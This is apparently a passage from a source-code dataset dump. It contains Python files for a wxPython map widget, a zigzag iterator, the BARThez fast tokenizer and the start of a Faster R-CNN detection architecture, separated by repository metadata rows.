        dc.SetBrush(wx.Brush(brushclr, style=wx.TRANSPARENT))
        dc.DrawRectangle(self.sbox_1_x, self.sbox_1_y,
                         self.sbox_w, self.sbox_h)
######
# Miscellaneous
######
def ResizeCallback(self, event=None):
    """Handle a window resize.

    event  that caused the resize, may be None (not used)

    Handle all possible states of view and map:
       . new view entirely within map
       . map smaller than view (just centre map)

    Set up view state.
    """
    # get new size of the view
    (self.view_width, self.view_height) = self.GetClientSizeTuple() if WX3 else self.GetClientSize()
    # NOTE(review): after the NKS edits both branches of each 'if' below
    # assign the same value, so the tests are now redundant; kept as-is.
    # if map > view in X axis
    if self.map_width > self.view_width:
        self.max_x_offset = self.map_width - self.view_width
        # NKS allow background to show
        # do nothing unless background is showing
        # if map left edge right of view edge
        #if self.view_offset_x < 0:
        #    # move view to hide background at left
        #    self.view_offset_x = 0
        #elif self.view_offset_x + self.view_width > self.map_width:
        #    # move view to hide background at right
        #    self.view_offset_x = self.map_width - self.view_width
    else:
        # else view >= map - centre map in X direction
        self.max_x_offset = self.map_width - self.view_width
    # if map > view in Y axis
    if self.map_height > self.view_height:
        self.max_y_offset = self.map_height - self.view_height
        # NKS allow background to show
        # do nothing unless background is showing
        # if map top edge below view edge
        #if self.view_offset_y < 0:
        #    # move view to hide background at top
        #    self.view_offset_y = 0
        #elif self.view_offset_y + self.view_height > self.map_height:
        #    # move view to hide background at bottom
        #    self.view_offset_y = self.map_height - self.view_height
    else:
        # else view >= map - centre map in Y direction
        self.max_y_offset = self.map_height - self.view_height
    # set the left/right/top/bottom lon/lat extents
    self.RecalcViewLonLatLimits()
def RecalcViewLonLatLimits(self):
    """Recalculate the view lon/lat extent values.

    Assumes only the .view_offset_? and .ppd_? values have been set.
    """
    # left edge follows from the map origin plus the view offset
    left_lon = self.map_llon + self.view_offset_x / self.ppd_x
    top_lat = self.map_tlat - self.view_offset_y / self.ppd_y
    self.view_llon = left_lon
    self.view_rlon = left_lon + self.view_width / self.ppd_x
    self.view_tlat = top_lat
    self.view_blat = top_lat - self.view_height / self.ppd_y
def ZoomToLevel(self, level):
    """Use a new tile level.

    level  the new tile level to use.

    Returns True if all went well.

    Maintain centre of map, if possible.
    """
    # reject levels outside the allowed range
    if not (self.min_level <= level <= self.max_level):
        return False
    map_extent = self.tiles.UseLevel(level)
    if not map_extent:
        return False
    self.level = level
    (self.map_width, self.map_height,
     self.ppd_x, self.ppd_y) = map_extent
    (self.map_llon, self.map_rlon,
     self.map_blat, self.map_tlat) = self.tiles.extent
    # do level change callback
    self.RaiseLevelChangeEvent(level)
    return True
def GetMapCoordsFromView(self, posn):
    """Convert view pixel coordinates to map coordinates.

    posn  is a tuple (x, y) of view pixel coordinates

    Returns (x, y) map pixel coordinates.
    """
    (view_x, view_y) = posn
    # map coords are just the view coords shifted by the view offset
    return (view_x + self.view_offset_x,
            view_y + self.view_offset_y)
######
# Select helpers - get objects that were selected
######
def GetNearestPointInLayer(self, layer, pt):
    """Determine if clicked location selects a point in layer data.

    layer  layer object we are looking in
    pt     click geo location (lon, lat) or screen (x, y)

    Return None (no selection) or ((x, y), data) of closest point.
    """
    # TODO: speed this up?  Do we need to??
    # http://en.wikipedia.org/wiki/Kd-tree
    # would need to create kd-tree in AddLayer()
    (ptx, pty) = pt
    res = None
    dist = 9999999.0        # more than possible
    # NOTE(review): 'dist' holds a *squared* distance but is compared
    # against layer.delta below - confirm delta is meant to be squared
    if layer.map_rel:
        for p in layer.data:
            (x, y, _, _, _, _, _, data) = p
            d = (x - ptx) * (x - ptx) + (y - pty) * (y - pty)
            if d < dist:
                dist = d
                res = ((x, y), data)
        if dist <= layer.delta:
            return res
    else:
        for p in layer.data:
            # set up DC size locals used by the placement code string
            dc = wx.BufferedPaintDC(self, self.buffer)
            (dc_w, dc_h) = dc.GetSize()
            dc_w2 = dc_w / 2
            dc_h2 = dc_h / 2
            dc_h -= 1
            dc_w -= 1
            (x, y, place, _, _, x_off, y_off, pdata) = p
            # the placement string rebinds x/y from the dc_* locals
            # NOTE(review): exec() cannot rebind function locals in
            # Python 3 - this idiom only works under Python 2; verify
            exec(self.point_view_placement[place])
            d = (x - ptx) * (x - ptx) + (y - pty) * (y - pty)
            if d < dist:
                dist = d
                res = ((x, y), pdata)
        if dist <= layer.delta:
            return res
    return None
def GetBoxSelPointsInLayer(self, layer, p1, p2):
    """Get list of points inside box.

    layer  reference to layer object we are working on
    p1     one corner point of selection box
    p2     opposite corner point of selection box

    We have to figure out which corner is which.

    Return None (no selection) or list [((lon, lat), data), ...]
    of points inside the selection box.
    """
    # TODO: speed this up?  Do we need to??
    # get canonical box limits
    (p1x, p1y) = p1
    (p2x, p2y) = p2
    lx = min(p1x, p2x)      # left x coord
    rx = max(p1x, p2x)
    ty = max(p1y, p2y)      # top y coord
    by = min(p1y, p2y)
    # get a list of points inside the selection box
    result = []
    if layer.map_rel:
        for p in layer.data:
            (x, y, _, _, _, _, _, pdata) = p
            if lx <= x <= rx and by <= y <= ty:
                result.append(((x, y), pdata))
    else:
        for p in layer.data:
            # set up DC size locals used by the placement code string
            dc = wx.BufferedPaintDC(self, self.buffer)
            (dc_w, dc_h) = dc.GetSize()
            dc_w2 = dc_w / 2
            dc_h2 = dc_h / 2
            dc_h -= 1
            dc_w -= 1
            (x, y, place, _, _, x_off, y_off, pdata) = p
            # the placement string rebinds x/y from the dc_* locals
            # NOTE(review): exec() cannot rebind function locals in
            # Python 3 - this idiom only works under Python 2; verify
            exec(self.point_view_placement[place])
            if lx <= x <= rx and by <= y <= ty:
                result.append(((x, y), pdata))
    return result
def GetNearestImageInLayer(self, layer, pt):
    """Decide if clicked location selects an image object in layer data.

    layer  layer object we are looking in
    pt     click geo location (lon, lat)

    Return None (no selection) or the (x, y) position of the closest image.
    """
    (ptx, pty) = pt
    best_posn = None
    best_dist = 9999999.0           # more than possible
    for entry in layer.data:
        img_x = entry[0]
        img_y = entry[1]
        dx = img_x - ptx
        dy = img_y - pty
        sq_dist = dx * dx + dy * dy
        if sq_dist < best_dist:
            best_dist = sq_dist
            best_posn = (img_x, img_y)
    # squared distance is compared against layer.delta, matching the
    # point-layer handler
    if best_dist <= layer.delta:
        return best_posn
    return None
def GetBoxSelImagesInLayer(self, layer, p1, p2):
    """Get list of images inside box p1-p2.

    layer  reference to layer object we are working on
    p1     one corner point of selection box
    p2     opposite corner point of selection box

    We have to figure out which corner is which.

    Return a list of (lon, lat) of images inside the box.
    """
    # canonicalise the box: any two opposite corners may be given
    (p1x, p1y) = p1
    (p2x, p2y) = p2
    left, right = min(p1x, p2x), max(p1x, p2x)
    bottom, top = min(p1y, p2y), max(p1y, p2y)
    return [(entry[0], entry[1])
            for entry in layer.data
            if left <= entry[0] <= right and bottom <= entry[1] <= top]
def GetNearestPolygonInLayer(self, layer, pt):
    """Get nearest polygon object in layer data.

    layer  layer object we are looking in
    pt     click geo location (lon, lat)

    Return None (no selection) or the first polygon containing the point.

    Code here originally supplied by Stefan Harwarth, from
    [http://paulbourke.net/geometry/insidepoly/].
    """
    (ptx, pty) = pt
    # each data entry holds the polygon point list as its first element
    for entry in layer.data:
        polygon = entry[0]
        if point_inside_polygon(ptx, pty, polygon):
            return polygon
    return None
def GetBoxSelPolygonsInLayer(self, layer, p1, p2):
    """Get list of polygons inside box p1-p2.

    layer  reference to layer object we are working on
    p1     one corner point of selection box
    p2     opposite corner point of selection box

    We have to figure out which corner is which.

    Return a list of (lon, lat) of points inside box.
    """
    # NOTE(review): box select for polygon layers is not implemented -
    # this stub always reports an empty selection.
    return []
def GetNearestTextInLayer(self, layer, pt):
    """Determine if clicked location selects a text object in layer data.

    layer  layer object we are looking in
    pt     click geo location (lon, lat)

    Return None (no selection) or ((x, y), data) of the closest text
    object's hotspot.

    Just search for text 'hotspot' - just like point select.
    Later make text sensitive (need text extent data).
    """
    (ptx, pty) = pt
    closest = None
    closest_dist = 1.0E+100         # more than possible
    for entry in layer.data:
        # each entry is a 12-tuple; position first, user data last
        text_x = entry[0]
        text_y = entry[1]
        user_data = entry[11]
        sq_dist = (text_x - ptx) * (text_x - ptx) + (text_y - pty) * (text_y - pty)
        if sq_dist < closest_dist:
            closest_dist = sq_dist
            closest = ((text_x, text_y), user_data)
    if closest_dist <= layer.delta:
        return closest
    return None
def GetBoxSelTextsInLayer(self, layer, p1, p2):
    """Get list of text objects inside box p1-p2.

    layer  reference to layer object we are working on
    p1     one corner point of selection box
    p2     opposite corner point of selection box

    We have to figure out which corner is which.

    Return a list [((lon, lat), data), ...] of text objects whose
    hotspot lies inside the selection box.
    """
    # canonicalise the box: any two opposite corners may be given
    (p1x, p1y) = p1
    (p2x, p2y) = p2
    left, right = min(p1x, p2x), max(p1x, p2x)
    bottom, top = min(p1y, p2y), max(p1y, p2y)
    # each entry is a 12-tuple; position first, user data last
    return [((entry[0], entry[1]), entry[11])
            for entry in layer.data
            if left <= entry[0] <= right and bottom <= entry[1] <= top]
######
# The next two routines could be folded into one as they are the same.
# However, if we ever implement a 'staged' zoom, we need both routines.
######
def ZoomIn(self, xy, update=True):
    """Zoom map in to the next level.

    xy      is a tuple (x, y) of pixel coords of new centre after zoom
    update  if True (the default) call self.Update() to redraw the canvas

    The tile stuff has already been set to the correct level.
    """
    (map_x, map_y) = self.GetMapCoordsFromView(xy)
    # doubling the map coords keeps the clicked point in place at the
    # new (2x) level; subtract half the view to centre it
    self.view_offset_x = 2 * map_x - self.view_width / 2
    self.view_offset_y = 2 * map_y - self.view_height / 2
    # refresh internal view state through the resize path
    self.ResizeCallback()
    if update:
        self.Update()
def ZoomOut(self, xy, update=True):
    """Zoom map out to the previous level.

    xy      is a tuple (x, y) of pixel coords of new centre after zoom
    update  if True (the default) call self.Update() to redraw the canvas

    The tile stuff has already been set to the correct level.
    """
    half_width = self.view_width / 2
    half_height = self.view_height / 2
    (map_x, map_y) = self.GetMapCoordsFromView(xy)
    # halving the map coords keeps the clicked point in place at the
    # new (0.5x) level; subtract half the view to centre it
    self.view_offset_x = map_x / 2 - half_width
    self.view_offset_y = map_y / 2 - half_height
    # refresh internal view state through the resize path
    self.ResizeCallback()
    if update:
        self.Update()
######
# Routines for pySlip events
######
# there is no set_select_event() method and no self.select_event boolean
# flag as the user controls selectability on a layer-by-layer basis.
def RaiseSelectEvent(self, evtype, layer, point, mposn=None, vposn=None):
    """Raise a point SELECT event.

    evtype  select event type
    layer   layer the select was on
    point   point(s) selected, ie, a single or list of point tuples:
                ((x, y), data)
    mposn   map coordinates of the mouse click
    vposn   view coordinates of the mouse click

    Note: this could be a BOX select, ie, multiple points in 'point'.
    """
    # build the custom wx event and hand it to the widget's handler chain
    event = _PySlipEvent(_myEVT_PYSLIP_SELECT, self.GetId())
    event.evtype = evtype
    event.layer_id = layer.id
    event.point = point
    event.mposn = mposn
    event.vposn = vposn
    self.GetEventHandler().ProcessEvent(event)
def SetLevelChangeEvent(self, event):
    """Set event routine on level change.

    event  True if event is to be raised on change
    """
    self.change_level_event = event

def RaiseLevelChangeEvent(self, level):
    """Raise a LEVEL event (only if enabled via SetLevelChangeEvent)."""
    if self.change_level_event:
        event = _PySlipEvent(_myEVT_PYSLIP_LEVEL, self.GetId())
        event.level = level
        self.GetEventHandler().ProcessEvent(event)

def SetMousePositionEvent(self, event):
    """Set callback function on mouse move.

    event  True if event is to be raised on mouse move
    """
    self.mouse_position_event = event
def RaiseMousePositionEvent(self, posn):
    """Raise a mouse position event.

    posn  the new mouse position (in view pixel coordinates)

    The event's .position is the geo (lon, lat) position, or None when
    the mouse is not over the map.
    """
    if self.mouse_position_event:
        event = _PySlipEvent(_myEVT_PYSLIP_POSITION, self.GetId())
        if posn and self.PositionIsOnMap(posn):
            event.position = self.ConvertView2Geo(posn)
        else:
            event.position = None
        self.GetEventHandler().ProcessEvent(event)
def PositionIsOnMap(self, posn):
    """Return True if 'posn' is actually on map (not just view).

    posn  a tuple (x, y) position in view pixel coordinates

    NKS modification: the original edge tests were disabled, so every
    mouse position inside the view is accepted as being on the map.
    ('posn' is deliberately unused.)
    """
    # The original bounds-checking code that followed the unconditional
    # return was unreachable and has been removed.
    return True     # NKS always accept mouse coordinates
def get_i18n_kw(self, kwargs, kws, default):
    """Get alternate international keyword value.

    kwargs   dictionary to look for keyword value
    kws      iterable of keyword spelling strings
    default  default value if no keyword found

    Returns the keyword value.
    """
    # try every spelling except the last; the first truthy value wins
    for spelling in kws[:-1]:
        value = kwargs.get(spelling, None)
        if value:
            return value
    # fall back to the last spelling, honouring the caller's default
    return kwargs.get(kws[-1], default)
| 37.29952 | 104 | 0.544487 |
59b78fc2bbe8633851ad3b6c7acd28436858b8d6 | 1,058 | py | Python | CONTENT/Resources/guides/__UNSORTED/281_zigzag_iterator/iterator.py | impastasyndrome/DS-ALGO-OFFICIAL | c85ec9cf0af0009f038b7a571a7ac1fb466b7f3a | [
"Apache-2.0"
] | 13 | 2021-03-11T00:25:22.000Z | 2022-03-19T00:19:23.000Z | CONTENT/Resources/guides/__UNSORTED/281_zigzag_iterator/iterator.py | impastasyndrome/DS-ALGO-OFFICIAL | c85ec9cf0af0009f038b7a571a7ac1fb466b7f3a | [
"Apache-2.0"
] | 162 | 2021-03-09T01:52:11.000Z | 2022-03-12T01:09:07.000Z | CONTENT/Resources/guides/__UNSORTED/281_zigzag_iterator/iterator.py | impastasyndrome/DS-ALGO-OFFICIAL | c85ec9cf0af0009f038b7a571a7ac1fb466b7f3a | [
"Apache-2.0"
] | 12 | 2021-04-26T19:43:01.000Z | 2022-01-31T08:36:29.000Z | class ZigzagIterator(object):
def __init__(self, v1, v2):
"""
Initialize your data structure here.
:type v1: List[int]
:type v2: List[int]
"""
self.index = 0
self.numbers = [v1, v2]
self.positions = [0, 0]
def next(self):
"""
:rtype: int
"""
v = self.numbers[self.index]
pos = self.positions[self.index]
if pos < len(v):
value = v[pos]
self.positions[self.index] += 1
self.index = (self.index + 1) % 2
return value
else:
if self.hasNext():
self.index = (self.index + 1) % 2
return self.next()
else:
return None
def hasNext(self):
"""
:rtype: bool
"""
return any([self.positions[i] < len(self.numbers[i]) for i in range(2)])
# Your ZigzagIterator object will be instantiated and called as such:
# i, v = ZigzagIterator(v1, v2), []
# while i.hasNext(): v.append(i.next())
| 26.45 | 80 | 0.489603 |
2d669ff8db3da96c21a5b7b70a3dfc56772c04e1 | 10,170 | py | Python | src/transformers/models/barthez/tokenization_barthez_fast.py | marcoabrate/transformers | 3f77c26d74e1282955fefa8dfff2451e44f6d4a9 | [
"Apache-2.0"
] | 1 | 2021-02-22T02:52:17.000Z | 2021-02-22T02:52:17.000Z | src/transformers/models/barthez/tokenization_barthez_fast.py | marcoabrate/transformers | 3f77c26d74e1282955fefa8dfff2451e44f6d4a9 | [
"Apache-2.0"
] | null | null | null | src/transformers/models/barthez/tokenization_barthez_fast.py | marcoabrate/transformers | 3f77c26d74e1282955fefa8dfff2451e44f6d4a9 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# Copyright 2020 Ecole Polytechnique and the HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License
""" Tokenization classes for the BARThez model."""
import os
from shutil import copyfile
from typing import List, Optional, Tuple
from ...file_utils import is_sentencepiece_available
from ...tokenization_utils_fast import PreTrainedTokenizerFast
from ...utils import logging
if is_sentencepiece_available():
from .tokenization_barthez import BarthezTokenizer
else:
BarthezTokenizer = None
logger = logging.get_logger(__name__)
VOCAB_FILES_NAMES = {"vocab_file": "sentencepiece.bpe.model", "tokenizer_file": "tokenizer.json"}
PRETRAINED_VOCAB_FILES_MAP = {
"vocab_file": {
"moussaKam/mbarthez": "https://huggingface.co/moussaKam/mbarthez/resolve/main/sentencepiece.bpe.model",
"moussaKam/barthez": "https://huggingface.co/moussaKam/barthez/resolve/main/sentencepiece.bpe.model",
"moussaKam/barthez-orangesum-title": "https://huggingface.co/moussaKam/barthez-orangesum-title/resolve/main/sentencepiece.bpe.model",
},
"tokenizer_file": {
"moussaKam/mbarthez": "https://huggingface.co/moussaKam/mbarthez/resolve/main/tokenizer.json",
"moussaKam/barthez": "https://huggingface.co/moussaKam/barthez/resolve/main/tokenizer.json",
"moussaKam/barthez-orangesum-title": "https://huggingface.co/moussaKam/barthez-orangesum-title/resolve/main/tokenizer.json",
},
}
PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = {
"moussaKam/mbarthez": 1024,
"moussaKam/barthez": 1024,
"moussaKam/barthez-orangesum-title": 1024,
}
SPIECE_UNDERLINE = "▁"
class BarthezTokenizerFast(PreTrainedTokenizerFast):
    """
    Adapted from :class:`~transformers.CamembertTokenizer` and :class:`~transformers.BartTokenizer`. Construct a "fast"
    BARThez tokenizer. Based on `SentencePiece <https://github.com/google/sentencepiece>`__.

    This tokenizer inherits from :class:`~transformers.PreTrainedTokenizerFast` which contains most of the main
    methods. Users should refer to this superclass for more information regarding those methods.

    Args:
        vocab_file (:obj:`str`):
            `SentencePiece <https://github.com/google/sentencepiece>`__ file (generally has a `.spm` extension) that
            contains the vocabulary necessary to instantiate a tokenizer.
        bos_token (:obj:`str`, `optional`, defaults to :obj:`"<s>"`):
            The beginning of sequence token that was used during pretraining. Can be used a sequence classifier token.

            .. note::

                When building a sequence using special tokens, this is not the token that is used for the beginning of
                sequence. The token used is the :obj:`cls_token`.
        eos_token (:obj:`str`, `optional`, defaults to :obj:`"</s>"`):
            The end of sequence token.

            .. note::

                When building a sequence using special tokens, this is not the token that is used for the end of
                sequence. The token used is the :obj:`sep_token`.
        sep_token (:obj:`str`, `optional`, defaults to :obj:`"</s>"`):
            The separator token, which is used when building a sequence from multiple sequences, e.g. two sequences for
            sequence classification or for a text and a question for question answering. It is also used as the last
            token of a sequence built with special tokens.
        cls_token (:obj:`str`, `optional`, defaults to :obj:`"<s>"`):
            The classifier token which is used when doing sequence classification (classification of the whole sequence
            instead of per-token classification). It is the first token of the sequence when built with special tokens.
        unk_token (:obj:`str`, `optional`, defaults to :obj:`"<unk>"`):
            The unknown token. A token that is not in the vocabulary cannot be converted to an ID and is set to be this
            token instead.
        pad_token (:obj:`str`, `optional`, defaults to :obj:`"<pad>"`):
            The token used for padding, for example when batching sequences of different lengths.
        mask_token (:obj:`str`, `optional`, defaults to :obj:`"<mask>"`):
            The token used for masking values. This is the token used when training this model with masked language
            modeling. This is the token which the model will try to predict.
        additional_special_tokens (:obj:`List[str]`, `optional`, defaults to :obj:`["<s>NOTUSED", "</s>NOTUSED"]`):
            Additional special tokens used by the tokenizer.

    Attributes: sp_model (:obj:`SentencePieceProcessor`): The `SentencePiece` processor that is used for every
    conversion (string, tokens and IDs).
    """

    # class-level configuration consumed by PreTrainedTokenizerFast
    vocab_files_names = VOCAB_FILES_NAMES
    pretrained_vocab_files_map = PRETRAINED_VOCAB_FILES_MAP
    max_model_input_sizes = PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES
    model_input_names = ["input_ids", "attention_mask"]
    # slow-tokenizer counterpart (None when sentencepiece is unavailable)
    slow_tokenizer_class = BarthezTokenizer

    def __init__(
        self,
        vocab_file,
        tokenizer_file=None,
        bos_token="<s>",
        eos_token="</s>",
        sep_token="</s>",
        cls_token="<s>",
        unk_token="<unk>",
        pad_token="<pad>",
        mask_token="<mask>",
        **kwargs
    ):
        """Instantiate the fast tokenizer; see the class docstring for
        the meaning of the special-token arguments."""
        super().__init__(
            vocab_file,
            tokenizer_file=tokenizer_file,
            bos_token=bos_token,
            eos_token=eos_token,
            unk_token=unk_token,
            sep_token=sep_token,
            cls_token=cls_token,
            pad_token=pad_token,
            mask_token=mask_token,
            **kwargs,
        )

        # keep the path so save_vocabulary() can copy the .spm model file
        self.vocab_file = vocab_file

    def build_inputs_with_special_tokens(
        self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None
    ) -> List[int]:
        """
        Build model inputs from a sequence or a pair of sequence for sequence classification tasks by concatenating and
        adding special tokens. A BARThez sequence has the following format:

        - single sequence: ``<s> X </s>``
        - pair of sequences: ``<s> A </s></s> B </s>``

        Args:
            token_ids_0 (:obj:`List[int]`):
                List of IDs to which the special tokens will be added.
            token_ids_1 (:obj:`List[int]`, `optional`):
                Optional second list of IDs for sequence pairs.

        Returns:
            :obj:`List[int]`: List of `input IDs <../glossary.html#input-ids>`__ with the appropriate special tokens.
        """

        if token_ids_1 is None:
            return [self.cls_token_id] + token_ids_0 + [self.sep_token_id]
        cls = [self.cls_token_id]
        sep = [self.sep_token_id]
        # note the double separator between the two sequences
        return cls + token_ids_0 + sep + sep + token_ids_1 + sep

    def get_special_tokens_mask(
        self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None, already_has_special_tokens: bool = False
    ) -> List[int]:
        """
        Retrieve sequence ids from a token list that has no special tokens added. This method is called when adding
        special tokens using the tokenizer ``prepare_for_model`` method.

        Args:
            token_ids_0 (:obj:`List[int]`):
                List of IDs.
            token_ids_1 (:obj:`List[int]`, `optional`):
                Optional second list of IDs for sequence pairs.
            already_has_special_tokens (:obj:`bool`, `optional`, defaults to :obj:`False`):
                Whether or not the token list is already formatted with special tokens for the model.

        Returns:
            :obj:`List[int]`: A list of integers in the range [0, 1]: 1 for a special token, 0 for a sequence token.
        """
        if already_has_special_tokens:
            if token_ids_1 is not None:
                raise ValueError(
                    "You should not supply a second sequence if the provided sequence of "
                    "ids is already formated with special tokens for the model."
                )
            return list(map(lambda x: 1 if x in [self.sep_token_id, self.cls_token_id] else 0, token_ids_0))

        # mask mirrors build_inputs_with_special_tokens: 1 marks <s>/</s>
        if token_ids_1 is None:
            return [1] + ([0] * len(token_ids_0)) + [1]
        return [1] + ([0] * len(token_ids_0)) + [1, 1] + ([0] * len(token_ids_1)) + [1]

    def create_token_type_ids_from_sequences(
        self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None
    ) -> List[int]:
        """
        Create a mask from the two sequences passed to be used in a sequence-pair classification task.

        Args:
            token_ids_0 (:obj:`List[int]`):
                List of IDs.
            token_ids_1 (:obj:`List[int]`, `optional`):
                Optional second list of IDs for sequence pairs.

        Returns:
            :obj:`List[int]`: List of zeros.
        """
        sep = [self.sep_token_id]
        cls = [self.cls_token_id]

        # BARThez (like BART) does not use token type ids - all zeros
        if token_ids_1 is None:
            return len(cls + token_ids_0 + sep) * [0]
        return len(cls + token_ids_0 + sep + sep + token_ids_1 + sep) * [0]

    def save_vocabulary(self, save_directory: str, filename_prefix: Optional[str] = None) -> Tuple[str]:
        """Copy the sentencepiece model file into ``save_directory`` and
        return a 1-tuple with the written path.

        NOTE(review): on an invalid directory this logs an error and
        returns None (not a tuple) - callers unpacking the result will
        fail; confirm against the base-class contract.
        """
        if not os.path.isdir(save_directory):
            logger.error("Vocabulary path ({}) should be a directory".format(save_directory))
            return
        out_vocab_file = os.path.join(
            save_directory, (filename_prefix + "-" if filename_prefix else "") + VOCAB_FILES_NAMES["vocab_file"]
        )

        # avoid copying the file onto itself
        if os.path.abspath(self.vocab_file) != os.path.abspath(out_vocab_file):
            copyfile(self.vocab_file, out_vocab_file)

        return (out_vocab_file,)
| 44.217391 | 141 | 0.650246 |
56d83a80a5836531e7411aac3f6c255aafe651f6 | 138,151 | py | Python | research/object_detection/meta_architectures/faster_rcnn_meta_arch.py | 873040/Abhishek | 2ddd716e66bc5cc6e6f0787508dd07da0e02e75a | [
"Apache-2.0"
] | 10 | 2020-06-30T06:43:48.000Z | 2022-03-22T11:01:20.000Z | research/object_detection/meta_architectures/faster_rcnn_meta_arch.py | 873040/Abhishek | 2ddd716e66bc5cc6e6f0787508dd07da0e02e75a | [
"Apache-2.0"
] | 10 | 2019-12-28T21:31:19.000Z | 2020-04-12T20:01:58.000Z | research/object_detection/meta_architectures/faster_rcnn_meta_arch.py | 873040/Abhishek | 2ddd716e66bc5cc6e6f0787508dd07da0e02e75a | [
"Apache-2.0"
] | 9 | 2020-03-30T02:11:52.000Z | 2020-04-05T02:15:08.000Z | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Faster R-CNN meta-architecture definition.
General tensorflow implementation of Faster R-CNN detection models.
See Faster R-CNN: Ren, Shaoqing, et al.
"Faster R-CNN: Towards real-time object detection with region proposal
networks." Advances in neural information processing systems. 2015.
We allow for three modes: number_of_stages={1, 2, 3}. In case of 1 stage,
all of the user facing methods (e.g., predict, postprocess, loss) can be used as
if the model consisted only of the RPN, returning class agnostic proposals
(these can be thought of as approximate detections with no associated class
information). In case of 2 stages, proposals are computed, then passed
through a second stage "box classifier" to yield (multi-class) detections.
Finally, in case of 3 stages which is only used during eval, proposals are
computed, then passed through a second stage "box classifier" that will compute
refined boxes and classes, and then features are pooled from the refined and
non-maximum suppressed boxes and are passed through the box classifier again. If
number of stages is 3 during training it will be reduced to two automatically.
Implementations of Faster R-CNN models must define a new
FasterRCNNFeatureExtractor and override three methods: `preprocess`,
`_extract_proposal_features` (the first stage of the model), and
`_extract_box_classifier_features` (the second stage of the model). Optionally,
the `restore_fn` method can be overridden. See tests for an example.
A few important notes:
+ Batching conventions: We support batched inference and training where
all images within a batch have the same resolution. Batch sizes are determined
dynamically via the shape of the input tensors (rather than being specified
directly as, e.g., a model constructor).
A complication is that due to non-max suppression, we are not guaranteed to get
the same number of proposals from the first stage RPN (region proposal network)
for each image (though in practice, we should often get the same number of
proposals). For this reason we pad to a max number of proposals per image
within a batch. This `self.max_num_proposals` property is set to the
`first_stage_max_proposals` parameter at inference time and the
`second_stage_batch_size` at training time since we subsample the batch to
be sent through the box classifier during training.
For the second stage of the pipeline, we arrange the proposals for all images
within the batch along a single batch dimension. For example, the input to
_extract_box_classifier_features is a tensor of shape
`[total_num_proposals, crop_height, crop_width, depth]` where
total_num_proposals is batch_size * self.max_num_proposals. (And note that per
the above comment, a subset of these entries correspond to zero paddings.)
+ Coordinate representations:
Following the API (see model.DetectionModel definition), our outputs after
postprocessing operations are always normalized boxes however, internally, we
sometimes convert to absolute --- e.g. for loss computation. In particular,
anchors and proposal_boxes are both represented as absolute coordinates.
Images are resized in the `preprocess` method.
The Faster R-CNN meta architecture has two post-processing methods
`_postprocess_rpn` which is applied after first stage and
`_postprocess_box_classifier` which is applied after second stage. There are
three different ways post-processing can happen depending on number_of_stages
configured in the meta architecture:
1. When number_of_stages is 1:
`_postprocess_rpn` is run as part of the `postprocess` method where
true_image_shapes is used to clip proposals, perform non-max suppression and
normalize them.
2. When number of stages is 2:
`_postprocess_rpn` is run as part of the `_predict_second_stage` method where
`resized_image_shapes` is used to clip proposals, perform non-max suppression
and normalize them. In this case `postprocess` method skips `_postprocess_rpn`
and only runs `_postprocess_box_classifier` using `true_image_shapes` to clip
detections, perform non-max suppression and normalize them.
3. When number of stages is 3:
`_postprocess_rpn` is run as part of the `_predict_second_stage` using
`resized_image_shapes` to clip proposals, perform non-max suppression and
normalize them. Subsequently, `_postprocess_box_classifier` is run as part of
`_predict_third_stage` using `true_image_shapes` to clip detections, perform
non-max suppression and normalize them. In this case, the `postprocess` method
skips both `_postprocess_rpn` and `_postprocess_box_classifier`.
"""
import abc
import functools
import tensorflow as tf
from tensorflow.contrib import framework as contrib_framework
from tensorflow.contrib import slim as contrib_slim
from object_detection.anchor_generators import grid_anchor_generator
from object_detection.builders import box_predictor_builder
from object_detection.builders import hyperparams_builder
from object_detection.core import box_list
from object_detection.core import box_list_ops
from object_detection.core import box_predictor
from object_detection.core import losses
from object_detection.core import model
from object_detection.core import standard_fields as fields
from object_detection.core import target_assigner
from object_detection.utils import ops
from object_detection.utils import shape_utils
from object_detection.utils import variables_helper
# Short alias: the rest of this file refers to tf-slim as `slim`.
slim = contrib_slim
# Sentinel marking a Keras feature extractor whose construction has been
# deferred until first use (see FasterRCNNMetaArch.__init__).
_UNINITIALIZED_FEATURE_EXTRACTOR = '__uninitialized__'
class FasterRCNNFeatureExtractor(object):
  """Faster R-CNN Feature Extractor definition.

  Concrete extractors override `preprocess`, `_extract_proposal_features`
  and `_extract_box_classifier_features`; the public `extract_*` wrappers
  only supply the variable scoping.
  """

  def __init__(self,
               is_training,
               first_stage_features_stride,
               batch_norm_trainable=False,
               reuse_weights=None,
               weight_decay=0.0):
    """Constructor.

    Args:
      is_training: A boolean indicating whether the training version of the
        computation graph should be constructed.
      first_stage_features_stride: Output stride of extracted RPN feature map.
      batch_norm_trainable: Whether to update batch norm parameters during
        training or not. When training with a relative large batch size
        (e.g. 8), it could be desirable to enable batch norm update.
      reuse_weights: Whether to reuse variables. Default is None.
      weight_decay: float weight decay for feature extractor (default: 0.0).
    """
    self._is_training = is_training
    self._first_stage_features_stride = first_stage_features_stride
    # Batch norm is only updated when it is both requested and training.
    self._train_batch_norm = batch_norm_trainable and is_training
    self._reuse_weights = reuse_weights
    self._weight_decay = weight_decay

  @abc.abstractmethod
  def preprocess(self, resized_inputs):
    """Feature-extractor specific preprocessing (minus image resizing)."""
    pass

  def extract_proposal_features(self, preprocessed_inputs, scope):
    """Extracts first stage RPN features.

    These feature maps are consumed by the region proposal network (RPN) to
    predict proposals.

    Args:
